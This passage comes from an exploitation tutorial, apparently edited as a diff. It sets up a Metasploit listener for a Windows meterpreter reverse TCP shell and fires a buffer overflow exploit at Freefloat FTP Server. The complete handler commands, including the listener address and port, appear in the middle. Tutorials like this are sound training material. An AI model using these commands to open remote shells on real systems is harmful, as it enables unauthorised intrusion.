 Now we will start up Metasploit on our Kali linux machine with the following command:

 Once it loads we will configure a listener to wait for our reverse shell.
 Execute the following commands in the Metasploit console:

 use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 172.16.183.131 set LPORT 443 exploit

 You should see the output below:

 Finally we ready to test our exploit.
 Launch Freefloat FTP Server once again, and fire our final exploit.
-If all goes well, we should receive a Windows command shell on our Metasploit listener.
+If all goes well, we should receive an interactive meterpreter shell on our Metasploit listener.

 If it worked, congratulations!
 You have just successfully exploited a buffer overflow vulnerability and obtained and interactive shell on the target!